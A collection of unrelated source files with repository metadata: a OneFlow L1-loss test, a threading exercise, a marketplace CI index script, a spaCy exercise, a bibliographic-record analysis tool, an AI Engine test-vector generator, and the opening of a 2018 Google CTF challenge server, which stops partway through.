max_stars_repo: wanghongsheng01/framework_enflame @ debf613e05e3f5ea8084c3e79b60d0dd9e349526 | stars: 2 (2021-09-10T00:19:49Z to 2021-11-16T11:27:20Z)
max_issues_repo: duijiudanggecl/oneflow @ d2096ae14cf847509394a3b717021e2bd1d72f62 | issues: 1 (2021-06-16T08:37:50Z to 2021-06-16T08:37:50Z)
max_forks_repo: duijiudanggecl/oneflow @ d2096ae14cf847509394a3b717021e2bd1d72f62 | forks: 1 (2021-11-10T07:57:01Z to 2021-11-10T07:57:01Z)

"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import oneflow as flow
import numpy as np
import oneflow.typing as tp
from test_util import GenArgList
import unittest
from collections import OrderedDict
from typing import Dict
import os
def _compare_l1loss_with_np(
input_shape, target_shape, device_type, machine_ids, device_counts
):
input = np.random.random(size=input_shape).astype(np.float32)
target = np.random.random(size=target_shape).astype(np.float32)
assert device_type in ["cpu", "gpu"]
func_config = flow.FunctionConfig()
flow.clear_default_session()
if device_type == "cpu":
flow.config.cpu_device_num(device_counts)
else:
flow.config.gpu_device_num(device_counts)
func_config.default_placement_scope(flow.scope.placement(device_type, machine_ids))
func_config.default_logical_view(flow.scope.consistent_view())
def np_l1loss(np_input, np_target):
np_l1 = np.abs(np_target - np_input)
np_l1_mean = np.mean(np_l1)
np_l1_sum = np.sum(np_l1)
np_l1_dict = {
"np_l1_loss": np_l1,
"np_l1_loss_mean": np_l1_mean,
"np_l1_loss_sum": np_l1_sum,
}
return np_l1_dict
def np_l1_loss_diff(np_input, np_target):
# Use numpy to compute diff
original_shape = np_target.shape
elemcnt = np_target.size
prediction = np_input.reshape(-1)
label = np_target.reshape(-1)
prediction_grad = np.zeros((elemcnt)).astype(prediction.dtype)
for i in np.arange(elemcnt):
diff = prediction[i] - label[i]
prediction_grad[i] = np.sign(diff)
grad_mean = prediction_grad.reshape(original_shape) / elemcnt
        # TODO: if you want to get the grad when the reduction = "sum", you can use the following code
# grad_sum = prediction_grad.reshape(original_shape)
grad_dict = {
"np_grad_mean": grad_mean,
}
return grad_dict
# Use Numpy to compute l1 loss
np_out_l1loss_dict = np_l1loss(input, target)
# Use Numpy to compute l1 grad
np_grad_dict = np_l1_loss_diff(input, target)
def assert_prediction_grad(blob: tp.Numpy):
# Evaluate the gradient. Here we only test the reduction type == "mean"
assert np.allclose(blob, np_grad_dict["np_grad_mean"])
@flow.global_function(type="train", function_config=func_config)
def oneflow_l1loss(
of_input: tp.Numpy.Placeholder(shape=input.shape),
of_target: tp.Numpy.Placeholder(shape=target.shape),
) -> Dict[str, tp.Numpy]:
with flow.scope.placement(device_type, "0:0"):
v = flow.get_variable(
shape=target.shape,
dtype=flow.float32,
initializer=flow.constant_initializer(0),
name="v",
)
x_var = of_input + v
# watch the diff
flow.watch_diff(x_var, assert_prediction_grad)
l1loss = flow.nn.L1Loss(x_var, of_target, reduction="none", name="of_l1loss")
l1loss_mean = flow.nn.L1Loss(
x_var, of_target, reduction="mean", name="of_l1loss_mean"
)
l1loss_sum = flow.nn.L1Loss(
x_var, of_target, reduction="sum", name="of_l1loss_sum"
)
with flow.scope.placement(device_type, "0:0"):
# We only test reduction="mean" diff
flow.optimizer.SGD(
flow.optimizer.PiecewiseConstantScheduler([], [1e-3]), momentum=0
).minimize(l1loss_mean)
return {
"of_l1_loss": l1loss,
"of_l1_loss_mean": l1loss_mean,
"of_l1_loss_sum": l1loss_sum,
}
of_out_l1loss_dict = oneflow_l1loss(input, target)
assert np.allclose(
of_out_l1loss_dict["of_l1_loss"], np_out_l1loss_dict["np_l1_loss"]
)
assert np.allclose(
of_out_l1loss_dict["of_l1_loss_mean"][0], np_out_l1loss_dict["np_l1_loss_mean"]
)
assert np.allclose(
of_out_l1loss_dict["of_l1_loss_sum"][0], np_out_l1loss_dict["np_l1_loss_sum"]
)
def _gen_arg_dict(shape, device_type, machine_ids, device_counts):
# Generate a dict to pass parameter to test case
arg_dict = OrderedDict()
arg_dict["input_shape"] = [shape]
arg_dict["target_shape"] = [shape]
arg_dict["device_type"] = [device_type]
arg_dict["machine_ids"] = [machine_ids]
arg_dict["device_counts"] = [device_counts]
return arg_dict
@flow.unittest.skip_unless_1n1d()
class Testl1loss1n1d(flow.unittest.TestCase):
def test_l1loss_cpu(test_case):
arg_dict = _gen_arg_dict(
shape=(16, 3), device_type="cpu", machine_ids="0:0", device_counts=1
)
for arg in GenArgList(arg_dict):
_compare_l1loss_with_np(*arg)
@unittest.skipIf(os.getenv("ONEFLOW_TEST_CPU_ONLY"), "only test cpu cases")
def test_l1loss_gpu(test_case):
arg_dict = _gen_arg_dict(
shape=(3, 16, 32), device_type="gpu", machine_ids="0:0", device_counts=1
)
for arg in GenArgList(arg_dict):
_compare_l1loss_with_np(*arg)
@flow.unittest.skip_unless_1n2d()
class Testl1loss1n2d(flow.unittest.TestCase):
@unittest.skipIf(os.getenv("ONEFLOW_TEST_CPU_ONLY"), "only test cpu cases")
def test_l1loss_gpu_1n2d(test_case):
arg_dict = _gen_arg_dict(
shape=(3, 32, 16), device_type="gpu", machine_ids="0:0-1", device_counts=2
)
for arg in GenArgList(arg_dict):
_compare_l1loss_with_np(*arg)
if __name__ == "__main__":
unittest.main()
avg_line_length: 33.540984 | max_line_length: 99 | alphanum_fraction: 0.665689

path: Buta Nicolae/threads.py | hexsha: 865144cd196eb39a73555fc643c117d083a615cc | size: 744 | ext: py | lang: Python | licenses: ["MIT"]
max_stars_repo: RazvanBalau/parallel-2020 @ bd9c0dea6cc70e167320f64632d7a235522dfdb3 | stars: null
max_issues_repo: RazvanBalau/parallel-2020 @ bd9c0dea6cc70e167320f64632d7a235522dfdb3 | issues: null
max_forks_repo: RazvanBalau/parallel-2020 @ bd9c0dea6cc70e167320f64632d7a235522dfdb3 | forks: 23 (2020-01-15T15:02:39Z to 2020-01-15T17:23:03Z)

import threading
from multiprocessing import Queue
results = []
results2 = []
def take_numbers(q):
print('Enter the numbers:')
for i in range(0,3):
num1 = int(input('Enter first number: '))
num2 = int(input('Enter second number: '))
q.put(num1)
q.put(num2)
def add_num(q):
for i in range(0,3):
num1 = q.get()
num2 = q.get()
results.append(num1+num2)
results2.append(num1-num2)
q = Queue()
t2 = threading.Thread(target=add_num, args=(q, ))
t1 = threading.Thread(target=take_numbers, args=(q, ))
t2.start()
t1.start()
t2.join()
t1.join()
q.close()
for result in results:
print ("adunare =", result)
for result in results2:
print ("scadere =", result) | 20.666667 | 54 | 0.606183 |
d4c7b73306f8c0594f64a791f8292624d0ac8d82 | 11,237 | py | Python | Tests/Marketplace/prepare_public_index_for_private_testing.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
] | 799 | 2016-08-02T06:43:14.000Z | 2022-03-31T11:10:11.000Z | Tests/Marketplace/prepare_public_index_for_private_testing.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
] | 9,317 | 2016-08-07T19:00:51.000Z | 2022-03-31T21:56:04.000Z | Tests/Marketplace/prepare_public_index_for_private_testing.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
] | 1,297 | 2016-08-04T13:59:00.000Z | 2022-03-31T23:43:06.000Z | import time
import os
import sys
import shutil
import json
import argparse
from zipfile import ZipFile
from contextlib import contextmanager
from datetime import datetime
from Tests.private_build.upload_packs_private import download_and_extract_index, update_index_with_priced_packs, \
extract_packs_artifacts
from Tests.Marketplace.marketplace_services import init_storage_client
from Tests.scripts.utils.log_util import install_logging
from Tests.scripts.utils import logging_wrapper as logging
MAX_SECONDS_TO_WAIT_FOR_LOCK = 600
LOCK_FILE_PATH = 'lock.txt'
@contextmanager
def lock_and_unlock_dummy_index(public_storage_bucket, dummy_index_lock_path):
try:
acquire_dummy_index_lock(public_storage_bucket, dummy_index_lock_path)
yield
except Exception:
logging.exception("Error in dummy index lock context manager.")
finally:
release_dummy_index_lock(public_storage_bucket, dummy_index_lock_path)
def change_pack_price_to_zero(path_to_pack_metadata):
with open(path_to_pack_metadata, 'r') as pack_metadata_file:
pack_metadata = json.load(pack_metadata_file)
pack_metadata['price'] = 0
with open(path_to_pack_metadata, 'w') as pack_metadata_file:
json.dump(pack_metadata, pack_metadata_file, indent=4)
def change_packs_price_to_zero(public_index_folder_path):
paths_to_packs_in_merged_index = [pack_dir.path for pack_dir in os.scandir(public_index_folder_path) if
pack_dir.is_dir()]
for path_to_pack in paths_to_packs_in_merged_index:
path_to_pack_metadata = os.path.join(path_to_pack, 'metadata.json')
change_pack_price_to_zero(path_to_pack_metadata)
def merge_private_index_into_public_index(public_index_folder_path, private_index_folder_path):
packs_in_private_index = [pack_dir.name for pack_dir in os.scandir(private_index_folder_path) if pack_dir.is_dir()]
for pack_name in packs_in_private_index:
path_to_pack_in_private_index = os.path.join(private_index_folder_path, pack_name)
path_to_pack_in_public_index = os.path.join(public_index_folder_path, pack_name)
shutil.copy(path_to_pack_in_private_index, path_to_pack_in_public_index)
def upload_modified_index(public_index_folder_path, extract_destination_path, public_ci_dummy_index_blob, build_number,
private_packs):
"""Upload updated index zip to cloud storage.
Args:
public_index_folder_path (str): public index folder full path.
extract_destination_path (str): extract folder full path.
public_ci_dummy_index_blob (Blob): google cloud storage object that represents the dummy index.zip blob.
build_number (str): circleCI build number, used as an index revision.
private_packs (list): List of private packs and their price.
"""
with open(os.path.join(public_index_folder_path, "index.json"), "w+") as index_file:
for private_pack in private_packs:
private_pack['price'] = 0
index = {
'revision': build_number,
'modified': datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ'),
'packs': private_packs
}
json.dump(index, index_file, indent=4)
index_zip_name = os.path.basename(public_index_folder_path)
index_zip_path = shutil.make_archive(base_name=public_index_folder_path, format="zip",
root_dir=extract_destination_path, base_dir=index_zip_name)
try:
public_ci_dummy_index_blob.reload()
public_ci_dummy_index_blob.cache_control = "no-cache,max-age=0" # disabling caching for index blob
public_ci_dummy_index_blob.upload_from_filename(index_zip_path)
logging.success("Finished uploading index.zip to storage.")
except Exception:
logging.exception("Failed in uploading index. Mismatch in index file generation.")
sys.exit(1)
finally:
shutil.rmtree(public_index_folder_path)
def option_handler():
"""Validates and parses script arguments.
Returns:
Namespace: Parsed arguments object.
"""
parser = argparse.ArgumentParser(description="Store packs in cloud storage.")
# disable-secrets-detection-start
parser.add_argument('-b', '--public_bucket_name', help="CI public bucket name", required=True)
parser.add_argument('-pb', '--private_bucket_name', help="CI private bucket name", required=True)
parser.add_argument('-s', '--service_account',
help=("Path to gcloud service account, is for circleCI usage. "
"For local development use your personal account and "
"authenticate using Google Cloud SDK by running: "
"`gcloud auth application-default login` and leave this parameter blank. "
"For more information go to: "
"https://googleapis.dev/python/google-api-core/latest/auth.html"),
required=False)
parser.add_argument('-n', '--ci_build_number',
help="CircleCi build number (will be used as hash revision at index file)", required=True)
parser.add_argument('-e', '--extract_public_index_path', help="Full path of folder to extract the public index",
required=True)
parser.add_argument('-sb', '--storage_base_path', help="Storage base path of the directory to upload to.",
required=False)
parser.add_argument('-p', '--pack_name', help="Modified pack to upload to gcs.")
parser.add_argument('-a', '--artifacts_path', help="The full path of packs artifacts", required=True)
parser.add_argument('-ea', '--extract_artifacts_path', help="Full path of folder to extract wanted packs",
required=True)
parser.add_argument('-di', '--dummy_index_dir_path', help="Full path to the dummy index in the private CI bucket",
required=True)
# disable-secrets-detection-end
return parser.parse_args()
def is_dummy_index_locked(public_storage_bucket, dummy_index_lock_path):
dummy_index_lock_blob = public_storage_bucket.blob(dummy_index_lock_path)
return dummy_index_lock_blob.exists()
def lock_dummy_index(public_storage_bucket, dummy_index_lock_path):
dummy_index_lock_blob = public_storage_bucket.blob(dummy_index_lock_path)
with open(LOCK_FILE_PATH, 'w') as lock_file:
lock_file.write('locked')
with open(LOCK_FILE_PATH, 'rb') as lock_file:
dummy_index_lock_blob.upload_from_file(lock_file)
def acquire_dummy_index_lock(public_storage_bucket, dummy_index_lock_path):
total_seconds_waited = 0
while is_dummy_index_locked(public_storage_bucket, dummy_index_lock_path):
if total_seconds_waited >= MAX_SECONDS_TO_WAIT_FOR_LOCK:
logging.critical("Error: Failed too long to acquire lock, exceeded max wait time.")
sys.exit(1)
if total_seconds_waited % 60 == 0:
# Printing a message every minute to keep the machine from dying due to no output
logging.info("Waiting to acquire lock.")
total_seconds_waited += 10
time.sleep(10)
lock_dummy_index(public_storage_bucket, dummy_index_lock_path)
def release_dummy_index_lock(public_storage_bucket, dummy_index_lock_path):
dummy_index_lock_blob = public_storage_bucket.blob(dummy_index_lock_path)
dummy_index_lock_blob.delete()
os.remove(LOCK_FILE_PATH)
def add_private_packs_from_dummy_index(private_packs, dummy_index_blob):
downloaded_dummy_index_path = 'current_dummy_index.zip'
extracted_dummy_index_path = 'dummy_index'
dummy_index_json_path = os.path.join(extracted_dummy_index_path, 'index', 'index.json')
dummy_index_blob.download_to_filename(downloaded_dummy_index_path)
os.mkdir(extracted_dummy_index_path)
if os.path.exists(downloaded_dummy_index_path):
with ZipFile(downloaded_dummy_index_path, 'r') as index_zip:
index_zip.extractall(extracted_dummy_index_path)
with open(dummy_index_json_path) as index_file:
index_json = json.load(index_file)
packs_from_dummy_index = index_json.get('packs', [])
for pack in private_packs:
is_pack_in_dummy_index = any(
[pack['id'] == dummy_index_pack['id'] for dummy_index_pack in packs_from_dummy_index])
if not is_pack_in_dummy_index:
packs_from_dummy_index.append(pack)
os.remove(downloaded_dummy_index_path)
shutil.rmtree(extracted_dummy_index_path)
return packs_from_dummy_index
def main():
install_logging('prepare_public_index_for_private_testing.log', logger=logging)
upload_config = option_handler()
service_account = upload_config.service_account
build_number = upload_config.ci_build_number
public_bucket_name = upload_config.public_bucket_name
private_bucket_name = upload_config.private_bucket_name
storage_base_path = upload_config.storage_base_path
extract_public_index_path = upload_config.extract_public_index_path
changed_pack = upload_config.pack_name
extract_destination_path = upload_config.extract_artifacts_path
packs_artifacts_path = upload_config.artifacts_path
dummy_index_dir_path = upload_config.dummy_index_dir_path
dummy_index_path = os.path.join(dummy_index_dir_path, 'index.zip')
dummy_index_lock_path = os.path.join(dummy_index_dir_path, 'lock.txt')
storage_client = init_storage_client(service_account)
public_storage_bucket = storage_client.bucket(public_bucket_name)
private_storage_bucket = storage_client.bucket(private_bucket_name)
dummy_index_blob = public_storage_bucket.blob(dummy_index_path)
with lock_and_unlock_dummy_index(public_storage_bucket, dummy_index_lock_path):
extract_packs_artifacts(packs_artifacts_path, extract_destination_path)
public_index_folder_path, public_index_blob, _ = download_and_extract_index(public_storage_bucket,
extract_public_index_path, storage_base_path)
# In order for the packs to be downloaded successfully, their price has to be 0
change_packs_price_to_zero(public_index_folder_path)
private_packs, private_index_path, private_index_blob = update_index_with_priced_packs(private_storage_bucket,
extract_destination_path,
public_index_folder_path,
changed_pack, True,
storage_base_path)
private_packs = add_private_packs_from_dummy_index(private_packs, dummy_index_blob)
upload_modified_index(public_index_folder_path, extract_public_index_path, dummy_index_blob, build_number,
private_packs)
if __name__ == '__main__':
main()
avg_line_length: 48.021368 | max_line_length: 129 | alphanum_fraction: 0.707128

path: exercises/pt/exc_01_03_01.py | hexsha: be04c82cd5f62929d01752841a8ec17a1254d468 | size: 291 | ext: py | lang: Python | licenses: ["MIT"]
max_stars_repo: Jette16/spacy-course @ 32df0c8f6192de6c9daba89740a28c0537e4d6a0 | stars: 2,085 (2019-04-17T13:10:40Z to 2022-03-30T21:51:46Z)
max_issues_repo: Jette16/spacy-course @ 32df0c8f6192de6c9daba89740a28c0537e4d6a0 | issues: 79 (2019-04-18T14:42:55Z to 2022-03-07T08:15:43Z)
max_forks_repo: Jette16/spacy-course @ 32df0c8f6192de6c9daba89740a28c0537e4d6a0 | forks: 361 (2019-04-17T13:34:32Z to 2022-03-28T04:42:45Z)

# Import the English language class and create an nlp object
from ____ import ____
nlp = ____
# Process the text
doc = ____("I like tree kangaroos and narwhals.")
# Select the first token
first_token = doc[____]
# Print the first token's text
print(first_token.____)
avg_line_length: 22.384615 | max_line_length: 69 | alphanum_fraction: 0.75945

path: text_selection/analyse_zenon_scrape.py | hexsha: 0775eae440b3ed8a8de73f26dfbbc57343a6323d | size: 6,670 | ext: py | lang: Python | licenses: ["MIT"]
max_stars_repo: dainst/chronoi-corpus-processing @ 7f508a7572e1022c4c88d1477db029e6619a1f0c | stars: null
max_issues_repo: dainst/chronoi-corpus-processing @ 7f508a7572e1022c4c88d1477db029e6619a1f0c | issues: null
max_forks_repo: dainst/chronoi-corpus-processing @ 7f508a7572e1022c4c88d1477db029e6619a1f0c | forks: null

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import csv
import furl
import json
import re
import sys
from collections import defaultdict
def filter_records_without_url(records: []) -> []:
return [r for r in records if any(r.get("urls"))]
def build_furl(url: str) -> furl.furl:
try:
furl_obj = furl.furl(url)
if not furl_obj.host:
furl_obj = furl.furl("http://" + url)
return furl_obj
except ValueError:
return furl.furl("https://invalid-url.xyz")
def determine_host(url: str) -> str:
furl_obj = build_furl(url)
return re.sub(r"^www[0-9]*\.", "", furl_obj.host)
def build_hosts_to_urls(records: []) -> {str: {str}}:
result = defaultdict(set)
for record in records:
for url in record.get("urls"):
host = determine_host(url.get("url"))
result[host].add(url.get("url"))
return result
def print_most_common_url_hosts(hosts_to_urls: {}, n: int):
hosts = [h for h in hosts_to_urls.keys() if len(hosts_to_urls[h]) > n]
hosts = sorted(hosts, key=lambda h: len(hosts_to_urls[h]))
for host in hosts:
print("% 6d\t%s" % (len(hosts_to_urls[host]), host))
def print_urls_for_host(hosts_to_urls: {}, host: str):
urls = hosts_to_urls.get(host, [])
for url in urls:
print(url)
if not any(urls):
print(f"No urls for host: '{host}'", file=sys.stderr)
def print_how_often_url_patterns_cooccur(records: [{}], pattern1: str, pattern2: str):
# It should be ok, to only pattern match the hosts here...
ids1 = {r.get("id") for r in records if record_has_matching_url(r, pattern1)}
ids2 = {r.get("id") for r in records if record_has_matching_url(r, pattern2)}
ids_both = ids1.intersection(ids2)
for host, number in {pattern1: len(ids1), pattern2: len(ids2), "both": len(ids_both)}.items():
print(f"{host}: {number}")
def record_has_matching_url(record: {}, pattern: str) -> bool:
return any(record_get_urls_matching(record, pattern))
def record_get_urls_matching(record: {}, pattern: str) -> [{}]:
result = []
for url in record.get("urls"):
if any(re.findall(pattern, url.get("url"))):
result.append(url)
return result
def record_remove_urls_not_matching(record: {}, pattern: str):
record["urls"] = record_get_urls_matching(record, pattern)
def earliest_year(year_strings: [str]) -> str:
years = []
for year_s in year_strings:
try:
years.append(int(year_s))
except ValueError:
print(f"Not a string that is a year: '{year_s}'", file=sys.stderr)
continue
return str(sorted(years)[0]) if any(years) else ""
def main(args: argparse.Namespace):
with open(args.scrape_file, "r") as file:
records = json.load(file)
records = filter_records_without_url(records)
# filter urls by the user-provided filter list
if args.desc_filters:
with open(args.desc_filters, "r") as file:
filters = file.read().splitlines()
for record in records:
record["urls"] = [url for url in record.get("urls") if url.get("desc") not in filters]
records = filter_records_without_url(records)
# print unique hosts or urls, then exit
if args.print_host_urls or args.print_common_hosts >= 0:
hosts_to_urls = build_hosts_to_urls(records)
if args.print_common_hosts >= 0:
print_most_common_url_hosts(hosts_to_urls, n=args.print_common_hosts)
elif args.print_host_urls:
print_urls_for_host(hosts_to_urls, host=args.print_host_urls)
exit(0)
# check in how many records the two given hosts co-occur, then exit
if args.patterns_cooccur:
host1, host2 = args.patterns_cooccur.split(",")
print_how_often_url_patterns_cooccur(records, host1, host2)
exit(0)
# do some selection based on a url pattern, remove all non-matching urls from the record
if args.select_by_url:
pattern = args.select_by_url
records = [r for r in records if record_has_matching_url(r, pattern)]
for record in records:
record_remove_urls_not_matching(record, pattern)
# sort the records by id, to be extra sure, that we get the same order every time this is called
# print each line as a csv column
records = sorted(records, key=lambda r: r.get("id"))
writer = csv.writer(sys.stdout, delimiter=",", quoting=csv.QUOTE_ALL)
for record in records:
to_print = []
if args.print_id:
to_print.append(record.get("id", ""))
if args.print_url:
to_print.append(record.get("urls")[0].get("url") if any(record.get("urls")) else "")
if args.print_pub_date:
to_print.append(earliest_year(record.get("publicationDates", [])))
if args.print_languages:
to_print.append("|".join(record.get("languages", [])))
writer.writerow(to_print)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description="Process a file with zenon json records and print some information about them.")
parser.add_argument("scrape_file", type=str, help="The file that contains the zenon dumps as json.")
parser.add_argument("--desc-filters", type=str, help="A file to filter urls by. Excludes urls with 'desc' fields matching a line in the file.")
# these are arguments to print some specific information
parser.add_argument("--print-common-hosts", type=int, default=-1, help="Print hosts that appear more than n times in the records urls, then exit.")
parser.add_argument("--print-host-urls", type=str, help="Print all urls for the host, then exit.")
parser.add_argument("--patterns-cooccur", type=str, help="Format: 'pattern1,pattern2', print how often these occur in single records url fields, then exit.")
# these are meant to work together select by a url pattern then print information about the records
parser.add_argument("--select-by-url", type=str, help="Give a pattern for a url to select records by.")
parser.add_argument("--print-url", action="store_true", help="Print the first of each urls for the selected records. (Ignores other urls present on the records if --select-url is given.)")
parser.add_argument("--print-pub-date", action="store_true", help="Print the earliest publication year for each of the selected records.")
parser.add_argument("--print-id", action="store_true", help="Print the selected records' ids")
parser.add_argument("--print-languages", action="store_true", help="Print the selected records' languages")
main(parser.parse_args())
avg_line_length: 40.670732 | max_line_length: 192 | alphanum_fraction: 0.669715

path: AI_Engine_Development/Feature_Tutorials/07-AI-Engine-Floating-Point/Utils/GenerationLib.py | hexsha: 07a919ed87f13258649cbf2c9c6e2971a4de419e | size: 5,568 | ext: py | lang: Python | licenses: ["Apache-2.0"]
max_stars_repo: jlamperez/Vitis-Tutorials @ 9a5b611caabb5656bbb2879116e032227b164bfd | stars: 1 (2022-03-09T06:15:43Z to 2022-03-09T06:15:43Z)
max_issues_repo: jlamperez/Vitis-Tutorials @ 9a5b611caabb5656bbb2879116e032227b164bfd | issues: null
max_forks_repo: jlamperez/Vitis-Tutorials @ 9a5b611caabb5656bbb2879116e032227b164bfd | forks: null

#
# Copyright 2020–2021 Xilinx, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
from math import *
import random
def GenerateTestVector(dtval,pliow,NPhases_s,NStreams_s,NSamples_s,NFrames_s,SeqType_s,Basename_s):
print('DtVal : ',dtval.get())
print('PLIO width : ',pliow.get())
print('NPhases : ',NPhases_s.get())
print('NStreams : ',NStreams_s.get())
print('NSamples : ',NSamples_s.get())
print('NFrames : ',NFrames_s.get())
print('Type of Sequence : ',SeqType_s.get())
print('Base filename : ',Basename_s.get())
NPhases = int(NPhases_s.get())
NStreams = int(NStreams_s.get())
LFrame = int(NSamples_s.get())
NFrames = int(NFrames_s.get())
SequenceType = SeqType_s.get()
Basename = Basename_s.get()
#parameters that should be in the GUI
# SequenceType ='Linear' # 'SinCos' 'Linear' 'Random' 'Dirac'
# Basename = 'PhaseIn'
NSamples = NPhases*NStreams*LFrame*NFrames;
NSamples1 = NPhases*NStreams*LFrame*(NFrames+1); # A little longer to allow for delay in streams
NBitsData = 32;
if( dtval.get() == 'int16'):
NBitsData = 16
HasImag = 0
if (dtval.get() == 'cint16'):
HasImag = 1
if(SequenceType != 'SinCos' and SequenceType != 'Linear' and SequenceType != 'Random' and SequenceType != 'Dirac'):
print ('Unknown Sequence Type')
return
# Create the overall signal that will be distributed over all streams
# it is already separated in phases
S = np.zeros((NPhases,int(NSamples1/NPhases),1+HasImag))
for i in range(int(NSamples1/NPhases)):
for p in range (NPhases):
k = i*NPhases+p
if (SequenceType == 'SinCos'):
vr = int(5000*cos(6.28*5/(NPhases*NStreams*LFrame)*k))
vi = int(5000*sin(6.28*5/(NPhases*NStreams*LFrame)*k))
elif (SequenceType == 'Linear'):
vr = k
vi = -k
elif (SequenceType == 'Random'):
vr = random.randint(-5000,5000)
vi = random.randint(-5000,5000)
elif (SequenceType == 'Dirac'):
vr = 0
vi = 0
if(k%151 == 1):
vr = 1
elif(k%151 == 40):
vi = 1
elif(k%151 == 81):
vr = 2
elif(k%151 == 115):
vi = -2
# if(k%311 == 50):
# vr = 1
# S[p,i,0] =
# if(HasImag==1):
# S[p,i,1] = int(5000*sin(6.28*5/(NPhases*NStreams*LFrame)*k))
S[p,i,0] = vr
if (HasImag == 1 ):
S[p,i,1] = vi
PLIOwidth = int(pliow.get())
NSamplesPerLine = int(PLIOwidth/NBitsData) # Data are read in blocks of 128 bits (4 data in cint16)
# Create an Input test Vector in TestInputS.txt
FileNames = [];
# Easiest case: 1 stream per AI Engine
if (NStreams == 1):
#Creates list of filenames
for Phi in range(NPhases):
FileNames.append(Basename+'_'+str(Phi)+'.txt')
#Open all files
fds = [open(path, 'w') for path in FileNames]
#Fill all files with the right data
for p in range(NPhases):
fd = fds[p]
for s in range(int(NSamples1/NPhases/NSamplesPerLine)):
for d in range(NSamplesPerLine):
index = s*NSamplesPerLine + d
fd.write(str(int(S[p,index,0]))+' ')
if(HasImag):
fd.write(str(int(S[p,index,1]))+' ')
fd.write('\n')
for fd in fds:
fd.close()
if (NStreams == 2):
#Creates list of filenames
for Phi in range(NPhases):
for Stream in range(NStreams):
FileNames.append('PhaseIn_'+str(Phi)+'_'+str(Stream)+'.txt')
# Hash table to associate data to streams
NSamplesIn128bits = int(128/NBitsData )
H = np.zeros((int(NSamples1/NPhases/2),2))
H = H.astype('int32')
index = np.zeros(2)
index = index.astype('int32')
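        # Samples are grouped into 128-bit blocks; consecutive blocks alternate between
        # stream 0 and stream 1, and H[n, stream] records which sample lands at slot n.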
for s in range(int(NSamples1/NPhases)):
k = int(s/NSamplesIn128bits) # Block order
i = k%2 # Which streams
H[index[i],i] = s
index[i] = index[i]+1
#Open all files
fds = [open(path, 'w') for path in FileNames]
#Fill all files with the right data
for p in range(NPhases):
for stream in range(2):
fd = fds[2*p+stream]
for s in range(int(NSamples1/NPhases/NSamplesPerLine/NStreams)):
for d in range(NSamplesPerLine):
index = s*NSamplesPerLine + d
fd.write(str(int(S[p,H[index,stream],0]))+' ')
if(HasImag):
fd.write(str(int(S[p,H[index,stream],1]))+' ')
fd.write('\n')
for fd in fds:
fd.close()
| 33.341317 | 119 | 0.541667 |
9c5ca9cec48517b47b0e018883a0875e922d1924 | 4,921 | py | Python | 2018/finals/pwn-gdb-as-a-service/web_challenge/challenge/gaas.py | iicarus-bit/google-ctf | 4eb8742bca58ff071ff8f6814d41d9ec7eb1db4b | [
"Apache-2.0"
] | 2,757 | 2018-04-28T21:41:36.000Z | 2022-03-29T06:33:36.000Z | 2018/finals/pwn-gdb-as-a-service/web_challenge/challenge/gaas.py | iicarus-bit/google-ctf | 4eb8742bca58ff071ff8f6814d41d9ec7eb1db4b | [
"Apache-2.0"
] | 20 | 2019-07-23T15:29:32.000Z | 2022-01-21T12:53:04.000Z | 2018/finals/pwn-gdb-as-a-service/web_challenge/challenge/gaas.py | iicarus-bit/google-ctf | 4eb8742bca58ff071ff8f6814d41d9ec7eb1db4b | [
"Apache-2.0"
] | 449 | 2018-05-09T05:54:05.000Z | 2022-03-30T14:54:18.000Z | #!/usr/bin/env python3
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from aiohttp import web
import capstone
import functools
from gdbproc import GDBProcess
import socketio
import asyncio
import codecs
import os
enable_logging = False
premium = 'PREMIUM' in os.environ
if premium:
access_key = os.getenv('PREMIUM_KEY')
runnable = ['/home/user/printwebflag']
else:
access_key = os.getenv('TRIAL_KEY')
runnable = ['/bin/sleep', '20']
MAX_INSN_LEN = 15
capstone_md = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64)
sio = socketio.AsyncServer()
app = web.Application()
sio.attach(app)
with open('index.html') as f:
index_html = f.read()
async def index(request):
if not 'key' in request.cookies:
return web.Response(status=401, text='permission denied (missing key)', content_type='text/html')
if request.cookies['key'] != access_key:
return web.Response(status=401, text='permission denied (invalid key)', content_type='text/html')
return web.Response(text=index_html, content_type='text/html')
app.add_routes([web.get('/', index),
web.get('/{name}', index)])
gdb_sessions = {}
stop_queue_readers = {}
async def on_shutdown(app):
await asyncio.gather(delete_gdb_process(sid) for sid in gdb_sessions.keys())
app.on_shutdown.append(on_shutdown)
def log(msg):
if enable_logging:
print('[*] {}'.format(msg))
@sio.on('connect')
def connect(sid, environ):
log('connected {}'.format(sid))
if not 'key={}'.format(access_key) in environ['HTTP_COOKIE']:
log('access_key not found {}'.format(environ['HTTP_COOKIE']))
return False
@sio.on('disconnect')
async def disconnect(sid):
log('disconnected {}'.format(sid))
await delete_gdb_process(sid)
async def stop_queue_reader(sid, queue):
while True:
pkt = await queue.get()
await update_all(sid)
async def create_gdb_process(sid):
